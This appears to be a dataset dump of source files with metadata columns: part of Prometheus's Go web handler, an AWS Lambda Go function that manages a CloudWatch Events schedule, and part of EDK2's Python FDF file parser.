status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
startTime := time.Now().UnixNano()
s, err := h.localStorage.Stats("__name__")
if err != nil {
if errors.Cause(err) == tsdb.ErrNotReady {
http.Error(w, tsdb.ErrNotReady.Error(), http.StatusServiceUnavailable)
return
}
http.Error(w, fmt.Sprintf("error gathering local storage statistics: %s", err), http.StatusInternalServerError)
return
}
status.Duration = fmt.Sprintf("%.3f", float64(time.Now().UnixNano()-startTime)/float64(1e9))
status.Stats = s.IndexPostingStats
status.NumSeries = s.NumSeries
status.MaxTime = s.MaxTime
status.MinTime = s.MinTime
h.executeTemplate(w, "status.html", status)
}
func (h *Handler) runtimeInfo() (api_v1.RuntimeInfo, error) {
status := api_v1.RuntimeInfo{
StartTime: h.birth,
CWD: h.cwd,
GoroutineCount: runtime.NumGoroutine(),
GOMAXPROCS: runtime.GOMAXPROCS(0),
GOGC: os.Getenv("GOGC"),
GODEBUG: os.Getenv("GODEBUG"),
}
if h.options.TSDBRetentionDuration != 0 {
status.StorageRetention = h.options.TSDBRetentionDuration.String()
}
if h.options.TSDBMaxBytes != 0 {
if status.StorageRetention != "" {
status.StorageRetention = status.StorageRetention + " or "
}
status.StorageRetention = status.StorageRetention + h.options.TSDBMaxBytes.String()
}
metrics, err := h.gatherer.Gather()
if err != nil {
return status, errors.Errorf("error gathering runtime status: %s", err)
}
for _, mF := range metrics {
switch *mF.Name {
case "prometheus_tsdb_head_chunks":
status.ChunkCount = int64(toFloat64(mF))
case "prometheus_tsdb_head_series":
status.TimeSeriesCount = int64(toFloat64(mF))
case "prometheus_tsdb_wal_corruptions_total":
status.CorruptionCount = int64(toFloat64(mF))
case "prometheus_config_last_reload_successful":
status.ReloadConfigSuccess = toFloat64(mF) != 0
case "prometheus_config_last_reload_success_timestamp_seconds":
status.LastConfigTime = time.Unix(int64(toFloat64(mF)), 0).UTC()
}
}
return status, nil
}
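// toFloat64 returns the value of the first metric in the family, whichever of
// gauge, counter or untyped is set, and NaN if none of them is.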
func toFloat64(f *io_prometheus_client.MetricFamily) float64 {
m := *f.Metric[0]
if m.Gauge != nil {
return m.Gauge.GetValue()
}
if m.Counter != nil {
return m.Counter.GetValue()
}
if m.Untyped != nil {
return m.Untyped.GetValue()
}
return math.NaN()
}
func (h *Handler) flags(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "flags.html", h.flagsMap)
}
func (h *Handler) serveConfig(w http.ResponseWriter, r *http.Request) {
h.mtx.RLock()
defer h.mtx.RUnlock()
h.executeTemplate(w, "config.html", h.config.String())
}
func (h *Handler) rules(w http.ResponseWriter, r *http.Request) {
h.executeTemplate(w, "rules.html", h.ruleManager)
}
func (h *Handler) serviceDiscovery(w http.ResponseWriter, r *http.Request) {
var index []string
targets := h.scrapeManager.TargetsAll()
for job := range targets {
index = append(index, job)
}
sort.Strings(index)
scrapeConfigData := struct {
Index []string
Targets map[string][]*scrape.Target
Active []int
Dropped []int
Total []int
}{
Index: index,
Targets: make(map[string][]*scrape.Target),
Active: make([]int, len(index)),
Dropped: make([]int, len(index)),
Total: make([]int, len(index)),
}
for i, job := range scrapeConfigData.Index {
scrapeConfigData.Targets[job] = make([]*scrape.Target, 0, len(targets[job]))
scrapeConfigData.Total[i] = len(targets[job])
for _, target := range targets[job] {
// Do not display more than 100 dropped targets per job to avoid
// returning too much data to the clients.
if target.Labels().Len() == 0 {
scrapeConfigData.Dropped[i]++
if scrapeConfigData.Dropped[i] > 100 {
continue
}
} else {
scrapeConfigData.Active[i]++
}
scrapeConfigData.Targets[job] = append(scrapeConfigData.Targets[job], target)
}
}
h.executeTemplate(w, "service-discovery.html", scrapeConfigData)
}
func (h *Handler) targets(w http.ResponseWriter, r *http.Request) {
tps := h.scrapeManager.TargetsActive()
for _, targets := range tps {
sort.Slice(targets, func(i, j int) bool {
iJobLabel := targets[i].Labels().Get(model.JobLabel)
jJobLabel := targets[j].Labels().Get(model.JobLabel)
if iJobLabel == jJobLabel {
return targets[i].Labels().Get(model.InstanceLabel) < targets[j].Labels().Get(model.InstanceLabel)
}
return iJobLabel < jJobLabel
})
}
h.executeTemplate(w, "targets.html", struct {
TargetPools map[string][]*scrape.Target
}{
TargetPools: tps,
})
}
func (h *Handler) version(w http.ResponseWriter, r *http.Request) {
dec := json.NewEncoder(w)
if err := dec.Encode(h.versionInfo); err != nil {
http.Error(w, fmt.Sprintf("error encoding JSON: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) quit(w http.ResponseWriter, r *http.Request) {
fmt.Fprintf(w, "Requesting termination... Goodbye!")
close(h.quitCh)
}
func (h *Handler) reload(w http.ResponseWriter, r *http.Request) {
rc := make(chan error)
h.reloadCh <- rc
if err := <-rc; err != nil {
http.Error(w, fmt.Sprintf("failed to reload config: %s", err), http.StatusInternalServerError)
}
}
func (h *Handler) consolesPath() string {
if _, err := os.Stat(h.options.ConsoleTemplatesPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/consoles/index.html"
}
if h.options.UserAssetsPath != "" {
if _, err := os.Stat(h.options.UserAssetsPath + "/index.html"); !os.IsNotExist(err) {
return h.options.ExternalURL.Path + "/user/index.html"
}
}
return ""
}
func tmplFuncs(consolesPath string, opts *Options) template_text.FuncMap {
return template_text.FuncMap{
"since": func(t time.Time) time.Duration {
return time.Since(t) / time.Millisecond * time.Millisecond
},
"consolesPath": func() string { return consolesPath },
"pathPrefix": func() string { return opts.ExternalURL.Path },
"pageTitle": func() string { return opts.PageTitle },
"buildVersion": func() string { return opts.Version.Revision },
"globalURL": func(u *url.URL) *url.URL {
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
return u
}
for _, lhr := range api_v1.LocalhostRepresentations {
if host == lhr {
_, ownPort, err := net.SplitHostPort(opts.ListenAddress)
if err != nil {
return u
}
if port == ownPort {
// Only in the case where the target is on localhost and its port is
// the same as the one we're listening on, we know for sure that
// we're monitoring our own process and that we need to change the
// scheme, hostname, and port to the externally reachable ones as
// well. We shouldn't need to touch the path at all, since if a
// path prefix is defined, the path under which we scrape ourselves
// should already contain the prefix.
u.Scheme = opts.ExternalURL.Scheme
u.Host = opts.ExternalURL.Host
} else {
// Otherwise, we only know that localhost is not reachable
// externally, so we replace only the hostname by the one in the
// external URL. It could be the wrong hostname for the service on
// this port, but it's still the best possible guess.
host, _, err := net.SplitHostPort(opts.ExternalURL.Host)
if err != nil {
return u
}
u.Host = host + ":" + port
}
break
}
}
return u
},
"numHealthy": func(pool []*scrape.Target) int {
alive := len(pool)
for _, p := range pool {
if p.Health() != scrape.HealthGood {
alive--
}
}
return alive
},
"targetHealthToClass": func(th scrape.TargetHealth) string {
switch th {
case scrape.HealthUnknown:
return "warning"
case scrape.HealthGood:
return "success"
default:
return "danger"
}
},
"ruleHealthToClass": func(rh rules.RuleHealth) string {
switch rh {
case rules.HealthUnknown:
return "warning"
case rules.HealthGood:
return "success"
default:
return "danger"
}
},
"alertStateToClass": func(as rules.AlertState) string {
switch as {
case rules.StateInactive:
return "success"
case rules.StatePending:
return "warning"
case rules.StateFiring:
return "danger"
default:
panic("unknown alert state")
}
},
}
}
func (h *Handler) getTemplate(name string) (string, error) {
var tmpl string
appendf := func(name string) error {
f, err := ui.Assets.Open(path.Join("/templates", name))
if err != nil {
return err
}
defer f.Close()
b, err := ioutil.ReadAll(f)
if err != nil {
return err
}
tmpl += string(b)
return nil
}
err := appendf("_base.html")
if err != nil {
return "", errors.Wrap(err, "error reading base template")
}
err = appendf(name)
if err != nil {
return "", errors.Wrapf(err, "error reading page template %s", name)
}
return tmpl, nil
}
func (h *Handler) executeTemplate(w http.ResponseWriter, name string, data interface{}) {
text, err := h.getTemplate(name)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
}
tmpl := template.NewTemplateExpander(
h.context,
text,
name,
data,
h.now(),
template.QueryFunc(rules.EngineQueryFunc(h.queryEngine, h.storage)),
h.options.ExternalURL,
)
tmpl.Funcs(tmplFuncs(h.consolesPath(), h.options))
result, err := tmpl.ExpandHTML(nil)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
io.WriteString(w, result)
}
// AlertStatus bundles alerting rules and the mapping of alert states to row classes.
type AlertStatus struct {
Groups []*rules.Group
AlertStateToRowClass map[rules.AlertState]string
Counts AlertByStateCount
}
type AlertByStateCount struct {
Inactive int32
Pending int32
Firing int32
}
func setPathWithPrefix(prefix string) func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(handlerName string, handler http.HandlerFunc) http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
handler(w, r.WithContext(httputil.ContextWithPath(r.Context(), prefix+r.URL.Path)))
}
}
}
|
[
"\"GOGC\"",
"\"GODEBUG\"",
"\"GOGC\"",
"\"GODEBUG\""
] |
[] |
[
"GOGC",
"GODEBUG"
] |
[]
|
["GOGC", "GODEBUG"]
|
go
| 2 | 0 | |
api/main.go
|
package main
import (
"os"
"fmt"
"log"
"time"
"context"
"strconv"
"net/http"
"encoding/json"
"github.com/aws/aws-lambda-go/events"
"github.com/aws/aws-lambda-go/lambda"
"github.com/aws/aws-sdk-go-v2/aws"
"github.com/aws/aws-sdk-go-v2/config"
"github.com/aws/aws-sdk-go-v2/service/cloudwatchevents"
slambda "github.com/aws/aws-sdk-go-v2/service/lambda"
"github.com/aws/aws-sdk-go-v2/service/lambda/types"
)
type APIResponse struct {
Last string `json:"last"`
Message string `json:"message"`
Schedule string `json:"schedule"`
}
type Response events.APIGatewayProxyResponse
var cfg aws.Config
var lambdaClient *slambda.Client
var cloudwatcheventsClient *cloudwatchevents.Client
const layout string = "2006-01-02 15:04"
func HandleRequest(ctx context.Context, request events.APIGatewayProxyRequest) (Response, error) {
var jsonBytes []byte
var err error
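// Requests coming through API Gateway carry a source IP and a JSON body with
// an "action" of "describe" or "put"; invocations without one (e.g. the
// scheduled CloudWatch Events trigger) just record the event time via
// updateLambdaEnvironment.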
if len(request.RequestContext.Identity.SourceIP) > 0 {
log.Println(request.RequestContext.Identity.SourceIP)
d := make(map[string]string)
json.Unmarshal([]byte(request.Body), &d)
if v, ok := d["action"]; ok {
switch v {
case "describe" :
schedule, e := describeRule(ctx)
if e != nil {
err = e
} else {
environment, e_ := getLambdaEnvironment(ctx)
if e_ != nil {
err = e_
} else {
jsonBytes, _ = json.Marshal(APIResponse{Message: "Success", Last: environment["LAST_EVENT"], Schedule: schedule})
}
}
case "put" :
if minute, ok := d["minute"]; ok {
if hour, o2 := d["hour"]; o2 {
if day, o3 := d["day"]; o3 {
if month, o4 := d["month"]; o4 {
if year, o5 := d["year"]; o5 {
e := putRule(ctx, minute, hour, day, month, year)
if e != nil {
err = e
} else {
jsonBytes, _ = json.Marshal(APIResponse{Message: "Success", Last: "", Schedule: ""})
}
}
}
}
}
}
}
}
if err != nil {
log.Print(err)
jsonBytes, _ = json.Marshal(APIResponse{Message: fmt.Sprint(err), Last: "", Schedule: ""})
return Response{
StatusCode: http.StatusInternalServerError,
Body: string(jsonBytes),
}, nil
}
} else {
err := updateLambdaEnvironment(ctx)
if err != nil {
log.Print(err)
jsonBytes, _ = json.Marshal(APIResponse{Message: fmt.Sprint(err), Last: "", Schedule: ""})
return Response{
StatusCode: http.StatusInternalServerError,
Body: string(jsonBytes),
}, nil
} else {
jsonBytes, _ = json.Marshal(APIResponse{Message: "Success", Last: "", Schedule: ""})
}
}
return Response {
StatusCode: http.StatusOK,
Body: string(jsonBytes),
}, nil
}
func describeRule(ctx context.Context)(string, error) {
if cloudwatcheventsClient == nil {
cloudwatcheventsClient = getCloudwatcheventsClient(ctx)
}
params := &cloudwatchevents.DescribeRuleInput{
Name: aws.String(os.Getenv("EVENT_NAME")),
}
res, err := cloudwatcheventsClient.DescribeRule(ctx, params)
if err != nil {
log.Print(err)
return "", err
}
return aws.ToString(res.ScheduleExpression), nil
}
func putRule(ctx context.Context, minute string, hour string, day string, month string, year string) error {
var m_ int
var h_ int
var d_ int
var o_ int
var y_ int
m_, _ = strconv.Atoi(minute)
h_, _ = strconv.Atoi(hour)
d_, _ = strconv.Atoi(day)
o_, _ = strconv.Atoi(month)
y_, _ = strconv.Atoi(year)
if m_ < 0 {
m_ = 0
}
sm := strconv.Itoa(m_)
if h_ < 0 {
h_ = 0
}
sh := strconv.Itoa(h_)
sd := "*"
if d_ > 0 {
sd = strconv.Itoa(d_)
}
so := "*"
if o_ > 0 {
so = strconv.Itoa(o_)
}
sy := "*"
if y_ >= 1970 {
sy = strconv.Itoa(y_)
}
if cloudwatcheventsClient == nil {
cloudwatcheventsClient = getCloudwatcheventsClient(ctx)
}
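// Build a CloudWatch Events cron expression of the form
// "cron(minute hour day-of-month month ? year)", using "*" for any of
// day/month/year that was not supplied.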
params := &cloudwatchevents.PutRuleInput{
Name: aws.String(os.Getenv("EVENT_NAME")),
ScheduleExpression: aws.String("cron(" + sm + " " + sh + " " + sd + " " + so + " ? " + sy + ")"),
}
res, err := cloudwatcheventsClient.PutRule(ctx, params)
if err != nil {
log.Print(err)
return err
}
log.Printf("%+v\n", res)
return nil
}
func getLambdaEnvironment(ctx context.Context)(map[string]string, error) {
if lambdaClient == nil {
lambdaClient = getLambdaClient(ctx)
}
res, err := lambdaClient.GetFunctionConfiguration(ctx, &slambda.GetFunctionConfigurationInput{
FunctionName: aws.String(os.Getenv("FUNCTION_NAME")),
})
if err != nil {
log.Println(err)
return map[string]string{}, err
}
return res.Environment.Variables, nil
}
func updateLambdaEnvironment(ctx context.Context) error {
t := time.Now()
env, err := getLambdaEnvironment(ctx)
if err != nil {
log.Println(err)
return err
}
env["LAST_EVENT"] = t.Format(layout)
_, err = lambdaClient.UpdateFunctionConfiguration(ctx, &slambda.UpdateFunctionConfigurationInput{
FunctionName: aws.String(os.Getenv("FUNCTION_NAME")),
Environment: &types.Environment{
Variables: env,
},
})
if err != nil {
log.Println(err)
return err
}
return nil
}
func getCloudwatcheventsClient(ctx context.Context) *cloudwatchevents.Client {
if cfg.Region != os.Getenv("REGION") {
cfg = getConfig(ctx)
}
return cloudwatchevents.NewFromConfig(cfg)
}
func getLambdaClient(ctx context.Context) *slambda.Client {
if cfg.Region != os.Getenv("REGION") {
cfg = getConfig(ctx)
}
return slambda.NewFromConfig(cfg)
}
func getConfig(ctx context.Context) aws.Config {
var err error
cfg, err := config.LoadDefaultConfig(ctx, config.WithRegion(os.Getenv("REGION")))
if err != nil {
log.Print(err)
}
return cfg
}
func main() {
lambda.Start(HandleRequest)
}
|
[
"\"EVENT_NAME\"",
"\"EVENT_NAME\"",
"\"FUNCTION_NAME\"",
"\"FUNCTION_NAME\"",
"\"REGION\"",
"\"REGION\"",
"\"REGION\""
] |
[] |
[
"FUNCTION_NAME",
"REGION",
"EVENT_NAME"
] |
[]
|
["FUNCTION_NAME", "REGION", "EVENT_NAME"]
|
go
| 3 | 0 | |
edk2/BaseTools/Source/Python/Common/FdfParserLite.py
|
## @file
# parse FDF file
#
# Copyright (c) 2007 - 2010, Intel Corporation. All rights reserved.<BR>
#
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
##
# Import Modules
#
import re
import os
import CommonDataClass.FdfClass
##define T_CHAR_SPACE ' '
##define T_CHAR_NULL '\0'
##define T_CHAR_CR '\r'
##define T_CHAR_TAB '\t'
##define T_CHAR_LF '\n'
##define T_CHAR_SLASH '/'
##define T_CHAR_BACKSLASH '\\'
##define T_CHAR_DOUBLE_QUOTE '\"'
##define T_CHAR_SINGLE_QUOTE '\''
##define T_CHAR_STAR '*'
##define T_CHAR_HASH '#'
(T_CHAR_SPACE, T_CHAR_NULL, T_CHAR_CR, T_CHAR_TAB, T_CHAR_LF, T_CHAR_SLASH, \
T_CHAR_BACKSLASH, T_CHAR_DOUBLE_QUOTE, T_CHAR_SINGLE_QUOTE, T_CHAR_STAR, T_CHAR_HASH) = \
(' ', '\0', '\r', '\t', '\n', '/', '\\', '\"', '\'', '*', '#')
SEPERATOR_TUPLE = ('=', '|', ',', '{', '}')
IncludeFileList = []
# Macro passed from command line, which has greatest priority and can NOT be overridden by those in FDF
InputMacroDict = {}
# All Macro values when parsing file, not replace existing Macro
AllMacroList = []
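## GetRealFileLine() method
#
#   Map a line number in the include-expanded buffer back to the original
#   file name and line number it came from.
#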
def GetRealFileLine (File, Line):
InsertedLines = 0
for Profile in IncludeFileList:
if Line >= Profile.InsertStartLineNumber and Line < Profile.InsertStartLineNumber + Profile.InsertAdjust + len(Profile.FileLinesList):
return (Profile.FileName, Line - Profile.InsertStartLineNumber + 1)
if Line >= Profile.InsertStartLineNumber + Profile.InsertAdjust + len(Profile.FileLinesList):
InsertedLines += Profile.InsertAdjust + len(Profile.FileLinesList)
return (File, Line - InsertedLines)
## The exception class used to report error messages when parsing FDF
#
# Currently the "ToolName" is set to be "FDF Parser".
#
class Warning (Exception):
## The constructor
#
# @param self The object pointer
# @param Str The message to record
# @param File The FDF name
# @param Line The Line number that error occurs
#
def __init__(self, Str, File = None, Line = None):
FileLineTuple = GetRealFileLine(File, Line)
self.FileName = FileLineTuple[0]
self.LineNumber = FileLineTuple[1]
self.message = Str + str(self.LineNumber)
self.ToolName = 'FDF Parser'
## The MACRO class used to record macro value data when parsing an include file
#
#
class MacroProfile :
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName, Line):
self.FileName = FileName
self.DefinedAtLine = Line
self.MacroName = None
self.MacroValue = None
## The include file content class used to record file data when parsing an include file
#
# May raise Exception when opening file.
#
class IncludeFileProfile :
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName):
self.FileName = FileName
self.FileLinesList = []
try:
fsock = open(FileName, "rb", 0)
try:
self.FileLinesList = fsock.readlines()
finally:
fsock.close()
except IOError:
raise Warning("Error when opening file %s" % FileName)
self.InsertStartLineNumber = None
self.InsertAdjust = 0
## The FDF content class used to record file data when parsing FDF
#
# May raise Exception when opening file.
#
class FileProfile :
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName):
self.FileLinesList = []
try:
fsock = open(FileName, "rb", 0)
try:
self.FileLinesList = fsock.readlines()
finally:
fsock.close()
except IOError:
raise Warning("Error when opening file %s" % FileName)
self.PcdDict = {}
self.InfList = []
self.PcdFileLineDict = {}
self.InfFileLineList = []
self.FdDict = {}
self.FvDict = {}
self.CapsuleList = []
# self.VtfList = []
# self.RuleDict = {}
## The syntax parser for FDF
#
# PreprocessFile method should be called prior to ParseFile
# CycleReferenceCheck method can detect cycles in FDF contents
#
# GetNext*** procedures get the next token first and then make a judgement on it.
# Get*** procedures make a judgement on the current token only.
#
class FdfParser(object):
## The constructor
#
# @param self The object pointer
# @param FileName The file that to be parsed
#
def __init__(self, FileName):
self.Profile = FileProfile(FileName)
self.FileName = FileName
self.CurrentLineNumber = 1
self.CurrentOffsetWithinLine = 0
self.CurrentFdName = None
self.CurrentFvName = None
self.__Token = ""
self.__SkippedChars = ""
self.__WipeOffArea = []
## __IsWhiteSpace() method
#
# Whether char at current FileBufferPos is whitespace
#
# @param self The object pointer
# @param Char The char to test
# @retval True The char is a kind of white space
# @retval False The char is NOT a kind of white space
#
def __IsWhiteSpace(self, Char):
if Char in (T_CHAR_NULL, T_CHAR_CR, T_CHAR_SPACE, T_CHAR_TAB, T_CHAR_LF):
return True
else:
return False
## __SkipWhiteSpace() method
#
# Skip white spaces from current char, return number of chars skipped
#
# @param self The object pointer
# @retval Count The number of chars skipped
#
def __SkipWhiteSpace(self):
Count = 0
while not self.__EndOfFile():
Count += 1
if self.__CurrentChar() in (T_CHAR_NULL, T_CHAR_CR, T_CHAR_LF, T_CHAR_SPACE, T_CHAR_TAB):
self.__SkippedChars += str(self.__CurrentChar())
self.__GetOneChar()
else:
Count = Count - 1
return Count
## __EndOfFile() method
#
    #   Judge whether the current buffer position is at the end of the file
#
# @param self The object pointer
# @retval True Current File buffer position is at file end
# @retval False Current File buffer position is NOT at file end
#
def __EndOfFile(self):
NumberOfLines = len(self.Profile.FileLinesList)
SizeOfLastLine = len(self.Profile.FileLinesList[-1])
if self.CurrentLineNumber == NumberOfLines and self.CurrentOffsetWithinLine >= SizeOfLastLine - 1:
return True
elif self.CurrentLineNumber > NumberOfLines:
return True
else:
return False
## __EndOfLine() method
#
    #   Judge whether the current buffer position is at the end of the line
#
# @param self The object pointer
# @retval True Current File buffer position is at line end
# @retval False Current File buffer position is NOT at line end
#
def __EndOfLine(self):
if self.CurrentLineNumber > len(self.Profile.FileLinesList):
return True
SizeOfCurrentLine = len(self.Profile.FileLinesList[self.CurrentLineNumber - 1])
if self.CurrentOffsetWithinLine >= SizeOfCurrentLine:
return True
else:
return False
## Rewind() method
#
# Reset file data buffer to the initial state
#
# @param self The object pointer
#
def Rewind(self):
self.CurrentLineNumber = 1
self.CurrentOffsetWithinLine = 0
## __UndoOneChar() method
#
# Go back one char in the file buffer
#
# @param self The object pointer
# @retval True Successfully go back one char
# @retval False Not able to go back one char as file beginning reached
#
def __UndoOneChar(self):
if self.CurrentLineNumber == 1 and self.CurrentOffsetWithinLine == 0:
return False
elif self.CurrentOffsetWithinLine == 0:
self.CurrentLineNumber -= 1
self.CurrentOffsetWithinLine = len(self.__CurrentLine()) - 1
else:
self.CurrentOffsetWithinLine -= 1
return True
## __GetOneChar() method
#
# Move forward one char in the file buffer
#
# @param self The object pointer
#
def __GetOneChar(self):
if self.CurrentOffsetWithinLine == len(self.Profile.FileLinesList[self.CurrentLineNumber - 1]) - 1:
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
else:
self.CurrentOffsetWithinLine += 1
## __CurrentChar() method
#
# Get the char pointed to by the file buffer pointer
#
# @param self The object pointer
# @retval Char Current char
#
def __CurrentChar(self):
return self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine]
## __NextChar() method
#
    #   Get the char one position past the char pointed to by the file buffer pointer
#
# @param self The object pointer
# @retval Char Next char
#
def __NextChar(self):
if self.CurrentOffsetWithinLine == len(self.Profile.FileLinesList[self.CurrentLineNumber - 1]) - 1:
return self.Profile.FileLinesList[self.CurrentLineNumber][0]
else:
return self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine + 1]
## __SetCurrentCharValue() method
#
# Modify the value of current char
#
# @param self The object pointer
# @param Value The new value of current char
#
def __SetCurrentCharValue(self, Value):
self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine] = Value
## __CurrentLine() method
#
# Get the list that contains current line contents
#
# @param self The object pointer
# @retval List current line contents
#
def __CurrentLine(self):
return self.Profile.FileLinesList[self.CurrentLineNumber - 1]
def __StringToList(self):
self.Profile.FileLinesList = [list(s) for s in self.Profile.FileLinesList]
self.Profile.FileLinesList[-1].append(' ')
def __ReplaceMacros(self, Str, File, Line):
MacroEnd = 0
while Str.find('$(', MacroEnd) >= 0:
MacroStart = Str.find('$(', MacroEnd)
if Str.find(')', MacroStart) > 0:
MacroEnd = Str.find(')', MacroStart)
Name = Str[MacroStart + 2 : MacroEnd]
Value = None
if Name in InputMacroDict:
Value = InputMacroDict[Name]
else:
for Profile in AllMacroList:
if Profile.FileName == File and Profile.MacroName == Name and Profile.DefinedAtLine <= Line:
Value = Profile.MacroValue
if Value != None:
Str = Str.replace('$(' + Name + ')', Value)
MacroEnd = MacroStart + len(Value)
else:
raise Warning("Macro not complete At Line ", self.FileName, self.CurrentLineNumber)
return Str
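    # Illustrative sketch only: with a command-line macro or DEFINE such as
    # FLASH_BASE = 0xFFF00000 (a hypothetical name), __ReplaceMacros turns the line
    #   "BaseAddress = $(FLASH_BASE)"
    # into
    #   "BaseAddress = 0xFFF00000"
    # A $(NAME) reference with no known value raises Warning("Macro not complete ...").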
def __ReplaceFragment(self, StartPos, EndPos, Value = ' '):
if StartPos[0] == EndPos[0]:
Offset = StartPos[1]
while Offset <= EndPos[1]:
self.Profile.FileLinesList[StartPos[0]][Offset] = Value
Offset += 1
return
Offset = StartPos[1]
while self.Profile.FileLinesList[StartPos[0]][Offset] not in ('\r', '\n'):
self.Profile.FileLinesList[StartPos[0]][Offset] = Value
Offset += 1
Line = StartPos[0]
while Line < EndPos[0]:
Offset = 0
while self.Profile.FileLinesList[Line][Offset] not in ('\r', '\n'):
self.Profile.FileLinesList[Line][Offset] = Value
Offset += 1
Line += 1
Offset = 0
while Offset <= EndPos[1]:
self.Profile.FileLinesList[EndPos[0]][Offset] = Value
Offset += 1
def __GetMacroName(self):
if not self.__GetNextToken():
raise Warning("expected Macro name", self.FileName, self.CurrentLineNumber)
MacroName = self.__Token
NotFlag = False
if MacroName.startswith('!'):
NotFlag = True
MacroName = MacroName[1:].strip()
if not MacroName.startswith('$(') or not MacroName.endswith(')'):
raise Warning("Macro name expected(Please use '$(%(Token)s)' if '%(Token)s' is a macro.)" % {"Token" : MacroName},
self.FileName, self.CurrentLineNumber)
MacroName = MacroName[2:-1]
return MacroName, NotFlag
## PreprocessFile() method
#
# Preprocess file contents, replace comments with spaces.
# In the end, rewind the file buffer pointer to the beginning
# BUGBUG: No !include statement processing contained in this procedure
# !include statement should be expanded at the same FileLinesList[CurrentLineNumber - 1]
#
# @param self The object pointer
#
def PreprocessFile(self):
self.Rewind()
InComment = False
DoubleSlashComment = False
HashComment = False
# HashComment in quoted string " " is ignored.
InString = False
while not self.__EndOfFile():
if self.__CurrentChar() == T_CHAR_DOUBLE_QUOTE and not InComment:
InString = not InString
# meet new line, then no longer in a comment for // and '#'
if self.__CurrentChar() == T_CHAR_LF:
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
if InComment and DoubleSlashComment:
InComment = False
DoubleSlashComment = False
if InComment and HashComment:
InComment = False
HashComment = False
# check for */ comment end
elif InComment and not DoubleSlashComment and not HashComment and self.__CurrentChar() == T_CHAR_STAR and self.__NextChar() == T_CHAR_SLASH:
self.__SetCurrentCharValue(T_CHAR_SPACE)
self.__GetOneChar()
self.__SetCurrentCharValue(T_CHAR_SPACE)
self.__GetOneChar()
InComment = False
# set comments to spaces
elif InComment:
self.__SetCurrentCharValue(T_CHAR_SPACE)
self.__GetOneChar()
# check for // comment
elif self.__CurrentChar() == T_CHAR_SLASH and self.__NextChar() == T_CHAR_SLASH and not self.__EndOfLine():
InComment = True
DoubleSlashComment = True
# check for '#' comment
elif self.__CurrentChar() == T_CHAR_HASH and not self.__EndOfLine() and not InString:
InComment = True
HashComment = True
# check for /* comment start
elif self.__CurrentChar() == T_CHAR_SLASH and self.__NextChar() == T_CHAR_STAR:
self.__SetCurrentCharValue( T_CHAR_SPACE)
self.__GetOneChar()
self.__SetCurrentCharValue( T_CHAR_SPACE)
self.__GetOneChar()
InComment = True
else:
self.__GetOneChar()
# restore from ListOfList to ListOfString
self.Profile.FileLinesList = ["".join(list) for list in self.Profile.FileLinesList]
self.Rewind()
## PreprocessIncludeFile() method
#
# Preprocess file contents, replace !include statements with file contents.
# In the end, rewind the file buffer pointer to the beginning
#
# @param self The object pointer
#
def PreprocessIncludeFile(self):
while self.__GetNextToken():
if self.__Token == '!include':
IncludeLine = self.CurrentLineNumber
IncludeOffset = self.CurrentOffsetWithinLine - len('!include')
if not self.__GetNextToken():
raise Warning("expected include file name At Line ", self.FileName, self.CurrentLineNumber)
IncFileName = self.__Token
if not os.path.isabs(IncFileName):
if IncFileName.startswith('$(WORKSPACE)'):
Str = IncFileName.replace('$(WORKSPACE)', os.environ.get('WORKSPACE'))
if os.path.exists(Str):
if not os.path.isabs(Str):
Str = os.path.abspath(Str)
IncFileName = Str
else:
# file is in the same dir with FDF file
FullFdf = self.FileName
if not os.path.isabs(self.FileName):
FullFdf = os.path.join(os.environ.get('WORKSPACE'), self.FileName)
IncFileName = os.path.join(os.path.dirname(FullFdf), IncFileName)
if not os.path.exists(os.path.normpath(IncFileName)):
raise Warning("Include file not exists At Line ", self.FileName, self.CurrentLineNumber)
IncFileProfile = IncludeFileProfile(os.path.normpath(IncFileName))
CurrentLine = self.CurrentLineNumber
CurrentOffset = self.CurrentOffsetWithinLine
# list index of the insertion, note that line number is 'CurrentLine + 1'
InsertAtLine = CurrentLine
IncFileProfile.InsertStartLineNumber = InsertAtLine + 1
                # deal with remaining portions after "!include filename", if any
if self.__GetNextToken():
if self.CurrentLineNumber == CurrentLine:
RemainingLine = self.__CurrentLine()[CurrentOffset:]
self.Profile.FileLinesList.insert(self.CurrentLineNumber, RemainingLine)
IncFileProfile.InsertAdjust += 1
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
for Line in IncFileProfile.FileLinesList:
self.Profile.FileLinesList.insert(InsertAtLine, Line)
self.CurrentLineNumber += 1
InsertAtLine += 1
IncludeFileList.append(IncFileProfile)
# comment out the processed include file statement
TempList = list(self.Profile.FileLinesList[IncludeLine - 1])
TempList.insert(IncludeOffset, '#')
self.Profile.FileLinesList[IncludeLine - 1] = ''.join(TempList)
self.Rewind()
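    # Illustrative sketch only (hypothetical file name): a line such as
    #   !include Common.fdf
    # is expanded in place -- the lines of Common.fdf are inserted into
    # Profile.FileLinesList right after the !include line, the statement itself is
    # commented out with '#', and an IncludeFileProfile is recorded so that
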